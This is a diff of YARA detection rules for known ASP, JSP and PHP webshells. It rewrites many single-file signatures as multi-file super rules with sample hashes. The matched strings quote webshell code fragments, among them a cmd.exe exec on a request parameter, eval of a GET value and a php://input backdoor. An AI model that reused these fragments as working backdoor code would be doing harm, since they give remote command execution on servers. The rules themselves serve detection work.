+		$s3 = "entrika.write \"BinaryStream.SaveToFile \"\"c:\\downloaded.zip\"\", adSaveCreate"
 
 	condition:
 		all of them
 }
-rule SIGNATURE_BASE_Webshell_ASP_Tool
+rule SIGNATURE_BASE_Webshell_Config_Myxx_Zend
 {
 	meta:
-		description = "Web Shell - file tool.asp"
+		description = "Web Shell - from files config.jsp, myxx.jsp, zend.jsp"
 		author = "Florian Roth (Nextron Systems)"
 		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
 		date = "2014-01-28"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L965-L980"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L2071-L2087"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "4ab68d38527d5834e9c1ff64407b34fb"
-		logic_hash = "62ba39bac09cb403a47678cd38c519642cc3c20f43c470b828ec448c42e9bb73"
+		logic_hash = "161dc712f279e73ea8cab4b0298cc2ca3799c6d9107050c4231a81021caed37f"
 		score = 70
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		super_rule = 1
+		hash0 = "d44df8b1543b837e57cc8f25a0a68d92"
+		hash1 = "e0354099bee243702eb11df8d0e046df"
+		hash2 = "591ca89a25f06cf01e4345f98a22845c"
 
 	strings:
-		$s0 = "Response.Write \"<FORM action=\"\"\" & Request.ServerVariables(\"URL\") & \"\"\""
-		$s3 = "Response.Write \"<tr><td><font face='arial' size='2'><b>&lt;DIR&gt; <a href='\" "
-		$s9 = "Response.Write \"<font face='arial' size='1'><a href=\"\"#\"\" onclick=\"\"javas"
+		$s3 = ".println(\"<a href=\\\"javascript:alert('You Are In File Now ! Can Not Pack !');"
 
 	condition:
-		2 of them
+		all of them
 }
-rule SIGNATURE_BASE_Webshell_Cmd_Win32
+rule SIGNATURE_BASE_Webshell_Browser_201_3_Ma_Download
 {
 	meta:
-		description = "Web Shell - file cmd_win32.jsp"
+		description = "Web Shell - from files browser.jsp, 201.jsp, 3.jsp, ma.jsp, download.jsp"
 		author = "Florian Roth (Nextron Systems)"
 		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
 		date = "2014-01-28"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L981-L995"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L2088-L2107"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "cc4d4d6cc9a25984aa9a7583c7def174"
-		logic_hash = "b90ba15b7b2c557f7b2303695b7f1f737f63df06d712c89e0cfea51c7d37e21d"
+		logic_hash = "3605e1304fb314c13d6c94d6ac9337731c6ee4fef679444d599cb3ae29023b56"
 		score = 70
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		super_rule = 1
+		hash0 = "37603e44ee6dc1c359feb68a0d566f76"
+		hash1 = "a7e25b8ac605753ed0c438db93f6c498"
+		hash2 = "fb8c6c3a69b93e5e7193036fd31a958d"
+		hash3 = "4cc68fa572e88b669bce606c7ace0ae9"
+		hash4 = "fa87bbd7201021c1aefee6fcc5b8e25a"
 
 	strings:
-		$s0 = "Process p = Runtime.getRuntime().exec(\"cmd.exe /c \" + request.getParam"
-		$s1 = "<FORM METHOD=\"POST\" NAME=\"myform\" ACTION=\"\">" fullword
+		$s2 = "<small>jsp File Browser version <%= VERSION_NR%> by <a"
+		$s3 = "else if (fName.endsWith(\".mpg\") || fName.endsWith(\".mpeg\") || fName.endsWith"
 
 	condition:
-		2 of them
+		all of them
 }
-rule SIGNATURE_BASE_Webshell_Jsp_Jshell
+rule SIGNATURE_BASE_Webshell_Itsec_Itsecteam_Shell_Jhn
 {
 	meta:
-		description = "Web Shell - file jshell.jsp"
+		description = "Web Shell - from files itsec.php, itsecteam_shell.php, jHn.php"
 		author = "Florian Roth (Nextron Systems)"
 		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
 		date = "2014-01-28"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L996-L1013"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L2108-L2125"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "124b22f38aaaf064cef14711b2602c06"
-		logic_hash = "dfe3ac097de4ca406ab7ec967fdc03d1e87c74f84fc675b58438a842d80cccda"
+		logic_hash = "2775d7e47a26e06ea716bdca32a0f768eccf4d269caa3d107b4a78f8684ce741"
 		score = 70
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		super_rule = 1
+		hash0 = "8ae9d2b50dc382f0571cd7492f079836"
+		hash1 = "bd6d3b2763c705a01cc2b3f105a25fa4"
+		hash2 = "40c6ecf77253e805ace85f119fe1cebb"
 
 	strings:
-		$s0 = "kXpeW[\"" fullword
-		$s4 = "[7b:g0W@W<" fullword
-		$s5 = "b:gHr,g<" fullword
-		$s8 = "RhV0W@W<" fullword
-		$s9 = "S_MR(u7b" fullword
+		$s4 = "echo $head.\"<font face='Tahoma' size='2'>Operating System : \".php_uname().\"<b"
+		$s5 = "echo \"<center><form name=client method='POST' action='$_SERVER[PHP_SELF]?do=db'"
 
 	condition:
 		all of them
 }
-rule SIGNATURE_BASE_Webshell_ASP_Zehir4
+rule SIGNATURE_BASE_Webshell_Ghost_Source_Icesword_Silic
 {
 	meta:
-		description = "Web Shell - file zehir4.asp"
+		description = "Web Shell - from files ghost_source.php, icesword.php, silic.php"
 		author = "Florian Roth (Nextron Systems)"
 		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
 		date = "2014-01-28"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L1014-L1027"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L2126-L2143"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "7f4e12e159360743ec016273c3b9108c"
-		logic_hash = "aa3e07ee6369dd5f86f28a53c8e45391de718d4935021339a7b47829b5196f54"
+		logic_hash = "22879d5279866e3c25a5b41a98b44595f191cfcac6489208b0bdb6b7ca7201e5"
 		score = 70
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		super_rule = 1
+		hash0 = "cbf64a56306c1b5d98898468fc1fdbd8"
+		hash1 = "6e20b41c040efb453d57780025a292ae"
+		hash2 = "437d30c94f8eef92dc2f064de4998695"
 
 	strings:
-		$s9 = "Response.Write \"<a href='\"&dosyaPath&\"?status=7&Path=\"&Path&\"/"
+		$s3 = "if(eregi('WHERE|LIMIT',$_POST['nsql']) && eregi('SELECT|FROM',$_POST['nsql'])) $"
+		$s6 = "if(!empty($_FILES['ufp']['name'])){if($_POST['ufn'] != '') $upfilename = $_POST["
 
 	condition:
 		all of them
 }
-rule SIGNATURE_BASE_Webshell_Wsb_Idc
+rule SIGNATURE_BASE_Webshell_Jspspy_Jspspyjdk5_Jspspyjdk51_Luci_Jsp_Spy2009_M_Ma3_Xxx
 {
 	meta:
-		description = "Web Shell - file idc.php"
+		description = "Web Shell"
 		author = "Florian Roth (Nextron Systems)"
 		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
 		date = "2014-01-28"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L1028-L1042"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L2144-L2187"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "7c5b1b30196c51f1accbffb80296395f"
-		logic_hash = "f274061f1a02ab65bc574a6586343f74262a463c5200cd2c231a752f54967404"
+		logic_hash = "6c61e5ccd4800f0cfd20532ab43f917f39a7367cc09cbe92e5320eb2c97fabf3"
 		score = 70
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		super_rule = 1
+		hash0 = "2eeb8bf151221373ee3fd89d58ed4d38"
+		hash1 = "059058a27a7b0059e2c2f007ad4675ef"
+		hash2 = "ae76c77fb7a234380cd0ebb6fe1bcddf"
+		hash3 = "76037ebd781ad0eac363d56fc81f4b4f"
+		hash4 = "8b457934da3821ba58b06a113e0d53d9"
+		hash5 = "fc44f6b4387a2cb50e1a63c66a8cb81c"
+		hash6 = "14e9688c86b454ed48171a9d4f48ace8"
+		hash7 = "b330a6c2d49124ef0729539761d6ef0b"
+		hash8 = "d71716df5042880ef84427acee8b121e"
+		hash9 = "341298482cf90febebb8616426080d1d"
+		hash10 = "29aebe333d6332f0ebc2258def94d57e"
+		hash11 = "42654af68e5d4ea217e6ece5389eb302"
+		hash12 = "88fc87e7c58249a398efd5ceae636073"
+		hash13 = "4a812678308475c64132a9b56254edbc"
+		hash14 = "9626eef1a8b9b8d773a3b2af09306a10"
+		hash15 = "344f9073576a066142b2023629539ebd"
+		hash16 = "32dea47d9c13f9000c4c807561341bee"
+		hash17 = "90a5ba0c94199269ba33a58bc6a4ad99"
+		hash18 = "655722eaa6c646437c8ae93daac46ae0"
+		hash19 = "b9744f6876919c46a29ea05b1d95b1c3"
+		hash20 = "9c94637f76e68487fa33f7b0030dd932"
+		hash21 = "6acc82544be056580c3a1caaa4999956"
+		hash22 = "6aa32a6392840e161a018f3907a86968"
+		hash23 = "349ec229e3f8eda0f9eb918c74a8bf4c"
+		hash24 = "3ea688e3439a1f56b16694667938316d"
+		hash25 = "ab77e4d1006259d7cbc15884416ca88c"
+		hash26 = "71097537a91fac6b01f46f66ee2d7749"
+		hash27 = "2434a7a07cb47ce25b41d30bc291cacc"
+		hash28 = "7a4b090619ecce6f7bd838fe5c58554b"
 
 	strings:
-		$s1 = "if (md5($_GET['usr'])==$user && md5($_GET['pass'])==$pass)" fullword
-		$s3 = "{eval($_GET['idc']);}" fullword
+		$s8 = "\"<form action=\\\"\"+SHELL_NAME+\"?o=upload\\\" method=\\\"POST\\\" enctype="
+		$s9 = "<option value='reg query \\\"HKLM\\\\System\\\\CurrentControlSet\\\\Control\\\\T"
 
 	condition:
-		1 of them
+		all of them
 }
-rule SIGNATURE_BASE_Webshell_Cpg_143_Incl_Xpl
+rule SIGNATURE_BASE_Webshell_2_520_Job_Ma1_Ma4_2
 {
 	meta:
-		description = "Web Shell - file cpg_143_incl_xpl.php"
+		description = "Web Shell - from files 2.jsp, 520.jsp, job.jsp, ma1.jsp, ma4.jsp, 2.jsp"
 		author = "Florian Roth (Nextron Systems)"
 		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
 		date = "2014-01-28"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L1043-L1057"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L2188-L2208"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "5937b131b67d8e0afdbd589251a5e176"
-		logic_hash = "7c2ce25c33e167761d72331d7c4d4f7cd6029ee0caf6e2008df8b12894faaaf8"
+		logic_hash = "db76ff42079b20d9e5c40661d7b30206e6bffc828f55daa4dc210662068f8e27"
 		score = 70
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		super_rule = 1
+		hash0 = "64a3bf9142b045b9062b204db39d4d57"
+		hash1 = "9abd397c6498c41967b4dd327cf8b55a"
+		hash2 = "56c005690da2558690c4aa305a31ad37"
+		hash3 = "532b93e02cddfbb548ce5938fe2f5559"
+		hash4 = "6e0fa491d620d4af4b67bae9162844ae"
+		hash5 = "7eabe0f60975c0c73d625b7ddf7b9cbd"
 
 	strings:
-		$s3 = "$data=\"username=\".urlencode($USER).\"&password=\".urlencode($PA"
-		$s5 = "fputs($sun_tzu,\"<?php echo \\\"Hi Master!\\\";ini_set(\\\"max_execution_time"
+		$s4 = "_url = \"jdbc:microsoft:sqlserver://\" + dbServer + \":\" + dbPort + \";User=\" "
+		$s9 = "result += \"<meta http-equiv=\\\"refresh\\\" content=\\\"2;url=\" + request.getR"
 
 	condition:
-		1 of them
+		all of them
 }
-rule SIGNATURE_BASE_Webshell_Mumaasp_Com
+rule SIGNATURE_BASE_Webshell_000_403_807_A_C5_Config_Css_Dm_He1P_Jspspy_Jspspyjdk5_Jspspyjdk51_Luci_Jsp_Xxx
 {
 	meta:
-		description = "Web Shell - file mumaasp.com.asp"
+		description = "Web Shell"
 		author = "Florian Roth (Nextron Systems)"
 		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
 		date = "2014-01-28"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L1058-L1071"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L2209-L2255"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "cce32b2e18f5357c85b6d20f564ebd5d"
-		logic_hash = "75e2a056782190e9914264b9e34002faea75a35ab0f97bf1e05dec15432d064c"
+		logic_hash = "cda47d7967b0f4b2a274ff2196d27d2e108b00917812093bbb3f033a8a1d1c3c"
 		score = 70
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		super_rule = 1
+		hash0 = "2eeb8bf151221373ee3fd89d58ed4d38"
+		hash1 = "059058a27a7b0059e2c2f007ad4675ef"
+		hash2 = "ae76c77fb7a234380cd0ebb6fe1bcddf"
+		hash3 = "76037ebd781ad0eac363d56fc81f4b4f"
+		hash4 = "8b457934da3821ba58b06a113e0d53d9"
+		hash5 = "d44df8b1543b837e57cc8f25a0a68d92"
+		hash6 = "fc44f6b4387a2cb50e1a63c66a8cb81c"
+		hash7 = "14e9688c86b454ed48171a9d4f48ace8"
+		hash8 = "b330a6c2d49124ef0729539761d6ef0b"
+		hash9 = "d71716df5042880ef84427acee8b121e"
+		hash10 = "341298482cf90febebb8616426080d1d"
+		hash11 = "29aebe333d6332f0ebc2258def94d57e"
+		hash12 = "42654af68e5d4ea217e6ece5389eb302"
+		hash13 = "88fc87e7c58249a398efd5ceae636073"
+		hash14 = "4a812678308475c64132a9b56254edbc"
+		hash15 = "9626eef1a8b9b8d773a3b2af09306a10"
+		hash16 = "e0354099bee243702eb11df8d0e046df"
+		hash17 = "344f9073576a066142b2023629539ebd"
+		hash18 = "32dea47d9c13f9000c4c807561341bee"
+		hash19 = "90a5ba0c94199269ba33a58bc6a4ad99"
+		hash20 = "655722eaa6c646437c8ae93daac46ae0"
+		hash21 = "b9744f6876919c46a29ea05b1d95b1c3"
+		hash22 = "9c94637f76e68487fa33f7b0030dd932"
+		hash23 = "6acc82544be056580c3a1caaa4999956"
+		hash24 = "6aa32a6392840e161a018f3907a86968"
+		hash25 = "591ca89a25f06cf01e4345f98a22845c"
+		hash26 = "349ec229e3f8eda0f9eb918c74a8bf4c"
+		hash27 = "3ea688e3439a1f56b16694667938316d"
+		hash28 = "ab77e4d1006259d7cbc15884416ca88c"
+		hash29 = "71097537a91fac6b01f46f66ee2d7749"
+		hash30 = "2434a7a07cb47ce25b41d30bc291cacc"
+		hash31 = "7a4b090619ecce6f7bd838fe5c58554b"
 
 	strings:
-		$s0 = "&9K_)P82ai,A}I92]R\"q!C:RZ}S6]=PaTTR"
+		$s0 = "ports = \"21,25,80,110,1433,1723,3306,3389,4899,5631,43958,65500\";" fullword
+		$s1 = "private static class VEditPropertyInvoker extends DefaultInvoker {" fullword
 
 	condition:
 		all of them
 }
-rule SIGNATURE_BASE_Webshell_Php_404
+rule SIGNATURE_BASE_Webshell_Wso2_5_1_Wso2_5_Wso2
 {
 	meta:
-		description = "Web Shell - file 404.php"
+		description = "Web Shell - from files wso2.5.1.php, wso2.5.php, wso2.php"
 		author = "Florian Roth (Nextron Systems)"
 		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
 		date = "2014-01-28"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L1072-L1085"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L2256-L2273"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "ced050df5ca42064056a7ad610a191b3"
-		logic_hash = "3fc928e6edda8fdc4220f57215db61b7fbf8de5b00423b219a173c8ecde40b79"
+		logic_hash = "f2dce52f1b8d2c33cd8478a468383a87f13712dc6e5c9050fea6ede4f0d24cc5"
 		score = 70
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		super_rule = 1
+		hash0 = "dbeecd555a2ef80615f0894027ad75dc"
+		hash1 = "7c8e5d31aad28eb1f0a9a53145551e05"
+		hash2 = "cbc44fb78220958f81b739b493024688"
 
 	strings:
-		$s0 = "$pass = md5(md5(md5($pass)));" fullword
+		$s7 = "$opt_charsets .= '<option value=\"'.$item.'\" '.($_POST['charset']==$item?'selec"
+		$s8 = ".'</td><td><a href=\"#\" onclick=\"g(\\'FilesTools\\',null,\\''.urlencode($f['na"
 
 	condition:
 		all of them
 }
-rule SIGNATURE_BASE_Webshell_Webshell_Cnseay_X
+rule SIGNATURE_BASE_Webshell_000_403_C5_Querydong_Spyjsp2010_T00Ls
 {
 	meta:
-		description = "Web Shell - file webshell-cnseay-x.php"
+		description = "Web Shell - from files 000.jsp, 403.jsp, c5.jsp, queryDong.jsp, spyjsp2010.jsp, t00ls.jsp"
 		author = "Florian Roth (Nextron Systems)"
 		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
 		date = "2014-01-28"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L1086-L1099"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L2274-L2294"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "a0f9f7f5cd405a514a7f3be329f380e5"
-		logic_hash = "59cb8b8a5873b716a25096c7b12f09293a812b63f31fea07d919b9c4d2bc9a19"
+		logic_hash = "6f507499304a7cf4d14a134a4c0781fed9a94c40fe3257a4168bacdf3910ffec"
 		score = 70
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		super_rule = 1
+		hash0 = "2eeb8bf151221373ee3fd89d58ed4d38"
+		hash1 = "059058a27a7b0059e2c2f007ad4675ef"
+		hash2 = "8b457934da3821ba58b06a113e0d53d9"
+		hash3 = "90a5ba0c94199269ba33a58bc6a4ad99"
+		hash4 = "655722eaa6c646437c8ae93daac46ae0"
+		hash5 = "9c94637f76e68487fa33f7b0030dd932"
 
 	strings:
-		$s9 = "$_F_F.='_'.$_P_P[5].$_P_P[20].$_P_P[13].$_P_P[2].$_P_P[19].$_P_P[8].$_P_"
+		$s8 = "table.append(\"<td nowrap> <a href=\\\"#\\\" onclick=\\\"view('\"+tbName+\"')"
+		$s9 = "\"<p><input type=\\\"hidden\\\" name=\\\"selectDb\\\" value=\\\"\"+selectDb+\""
 
 	condition:
 		all of them
 }
-rule SIGNATURE_BASE_Webshell_Asp_Up
+rule SIGNATURE_BASE_Webshell_404_Data_Suiyue
 {
 	meta:
-		description = "Web Shell - file up.asp"
+		description = "Web Shell - from files 404.jsp, data.jsp, suiyue.jsp"
 		author = "Florian Roth (Nextron Systems)"
 		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
 		date = "2014-01-28"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L1100-L1114"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L2295-L2311"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "f775e721cfe85019fe41c34f47c0d67c"
-		logic_hash = "dff2896d2226ade08e74147121a0e0036e8545dfff36b48b5a0771c9c7d537e9"
+		logic_hash = "7f4ab5dbd2a72574c5d188e14ae98e599359b2d662266fc4c3a39d3d4405c208"
 		score = 70
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		super_rule = 1
+		hash0 = "7066f4469c3ec20f4890535b5f299122"
+		hash1 = "9f54aa7b43797be9bab7d094f238b4ff"
+		hash2 = "c93d5bdf5cf62fe22e299d0f2b865ea7"
 
 	strings:
-		$s0 = "Pos = InstrB(BoundaryPos,RequestBin,getByteString(\"Content-Dispositio"
-		$s1 = "ContentType = getString(MidB(RequestBin,PosBeg,PosEnd-PosBeg))" fullword
+		$s3 = " sbCopy.append(\"<input type=button name=goback value=' \"+strBack[languageNo]+"
 
 	condition:
-		1 of them
+		all of them
 }
-rule SIGNATURE_BASE_Webshell_Phpkit_0_1A_Odd
+rule SIGNATURE_BASE_Webshell_R57Shell_R57Shell127_Sniper_SA_Shell_Egy_Spider_Shell_V2_R57_Xxx
 {
 	meta:
-		description = "Web Shell - file odd.php"
+		description = "Web Shell"
 		author = "Florian Roth (Nextron Systems)"
 		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
 		date = "2014-01-28"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L1115-L1131"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L2312-L2337"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "3c30399e7480c09276f412271f60ed01"
-		logic_hash = "745734658ed4000e1399531ae44125f8462ecd37388e6223cfa9bf91dbb52bbc"
+		logic_hash = "04a58352202538d5446f1000c07341ea70434f00403f116233f335213687636e"
 		score = 70
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		super_rule = 1
+		hash0 = "ef43fef943e9df90ddb6257950b3538f"
+		hash1 = "ae025c886fbe7f9ed159f49593674832"
+		hash2 = "911195a9b7c010f61b66439d9048f400"
+		hash3 = "697dae78c040150daff7db751fc0c03c"
+		hash4 = "513b7be8bd0595c377283a7c87b44b2e"
+		hash5 = "1d912c55b96e2efe8ca873d6040e3b30"
+		hash6 = "e5b2131dd1db0dbdb43b53c5ce99016a"
+		hash7 = "4108f28a9792b50d95f95b9e5314fa1e"
+		hash8 = "41af6fd253648885c7ad2ed524e0692d"
+		hash9 = "6fcc283470465eed4870bcc3e2d7f14d"
 
 	strings:
-		$s1 = "include('php://input');" fullword
-		$s3 = "ini_set('allow_url_include, 1'); // Allow url inclusion in this script" fullword
-		$s4 = "// uses include('php://input') to execute arbritary code" fullword
-		$s5 = "// php://input based backdoor" fullword
+		$s2 = "echo sr(15,\"<b>\".$lang[$language.'_text58'].$arrow.\"</b>\",in('text','mk_name"
+		$s3 = "echo sr(15,\"<b>\".$lang[$language.'_text21'].$arrow.\"</b>\",in('checkbox','nf1"
+		$s9 = "echo sr(40,\"<b>\".$lang[$language.'_text26'].$arrow.\"</b>\",\"<select size="
 
 	condition:
-		2 of them
+		all of them
 }
-rule SIGNATURE_BASE_Webshell_ASP_Cmd
+rule SIGNATURE_BASE_Webshell_807_A_Css_Dm_He1P_Jspspy_Xxx
 {
 	meta:
-		description = "Web Shell - file cmd.asp"
+		description = "Web Shell"
 		author = "Florian Roth (Nextron Systems)"
 		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
 		date = "2014-01-28"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L1132-L1145"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L2338-L2376"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "97af88b478422067f23b001dd06d56a9"
-		logic_hash = "c1353e43876e18f18638a558a29a12d6e82603641fedd81b042adca91fea0d18"
+		logic_hash = "eb045425a9f519dd7bf028a7795b16b89768682f5850b6a4d45f0991bfeb6431"
 		score = 70
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		super_rule = 1
+		hash0 = "ae76c77fb7a234380cd0ebb6fe1bcddf"
+		hash1 = "76037ebd781ad0eac363d56fc81f4b4f"
+		hash2 = "fc44f6b4387a2cb50e1a63c66a8cb81c"
+		hash3 = "14e9688c86b454ed48171a9d4f48ace8"
+		hash4 = "b330a6c2d49124ef0729539761d6ef0b"
+		hash5 = "d71716df5042880ef84427acee8b121e"
+		hash6 = "341298482cf90febebb8616426080d1d"
+		hash7 = "29aebe333d6332f0ebc2258def94d57e"
+		hash8 = "42654af68e5d4ea217e6ece5389eb302"
+		hash9 = "88fc87e7c58249a398efd5ceae636073"
+		hash10 = "4a812678308475c64132a9b56254edbc"
+		hash11 = "9626eef1a8b9b8d773a3b2af09306a10"
+		hash12 = "344f9073576a066142b2023629539ebd"
+		hash13 = "32dea47d9c13f9000c4c807561341bee"
+		hash14 = "b9744f6876919c46a29ea05b1d95b1c3"
+		hash15 = "6acc82544be056580c3a1caaa4999956"
+		hash16 = "6aa32a6392840e161a018f3907a86968"
+		hash17 = "349ec229e3f8eda0f9eb918c74a8bf4c"
+		hash18 = "3ea688e3439a1f56b16694667938316d"
+		hash19 = "ab77e4d1006259d7cbc15884416ca88c"
+		hash20 = "71097537a91fac6b01f46f66ee2d7749"
+		hash21 = "2434a7a07cb47ce25b41d30bc291cacc"
+		hash22 = "7a4b090619ecce6f7bd838fe5c58554b"
 
 	strings:
-		$s0 = "<%= \"\\\\\" & oScriptNet.ComputerName & \"\\\" & oScriptNet.UserName %>" fullword
+		$s1 = "\"<h2>Remote Control &raquo;</h2><input class=\\\"bt\\\" onclick=\\\"var"
+		$s2 = "\"<p>Current File (import new file name and new file)<br /><input class=\\\"inpu"
+		$s3 = "\"<p>Current file (fullpath)<br /><input class=\\\"input\\\" name=\\\"file\\\" i"
 
 	condition:
 		all of them
 }
-rule SIGNATURE_BASE_Webshell_PHP_Shell_X3
+rule SIGNATURE_BASE_Webshell_201_3_Ma_Download
 {
 	meta:
-		description = "Web Shell - file PHP Shell.php"
+		description = "Web Shell - from files 201.jsp, 3.jsp, ma.jsp, download.jsp"
 		author = "Florian Roth (Nextron Systems)"
 		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
 		date = "2014-01-28"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L1146-L1161"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L2377-L2396"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "a2f8fa4cce578fc9c06f8e674b9e63fd"
-		logic_hash = "7361a7eecf345b9c1809294b6b081db8769805ec3e6c656adc4ac87261193683"
